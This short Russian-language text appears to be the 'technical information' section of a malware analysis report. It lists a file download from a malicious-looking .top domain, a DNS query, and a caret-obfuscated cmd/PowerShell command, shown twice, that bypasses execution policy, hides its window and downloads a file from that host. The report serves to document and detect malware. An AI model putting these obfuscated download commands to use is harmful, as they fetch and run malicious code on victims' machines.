Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Pow^Ers^H^eLL.ex^E ^-EXeCuTioNp^O^lIC^y ^bY^Pa^sS^ -NO^p^ROFi^l^E^ -wi^N^D^owst^y^LE ^H^i^d^D^EN^ (neW^-o^bJecT SYs^tem.^N^eT.^Web^Clie^Nt).^DOwn^l^oaDfi^l^E('http://footare...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /c "Pow^Ers^H^eLL.ex^E ^-EXeCuTioNp^O^lIC^y ^bY^Pa^sS^ -NO^p^ROFi^l^E^ -wi^N^D^owst^y^LE ^H^i^d^D^EN^ (neW^-o^bJecT SYs^tem.^N^eT.^Web^Clie^Nt).^DOwn^l^oaDfi^l^E('http://footare...' (со скрытым окном)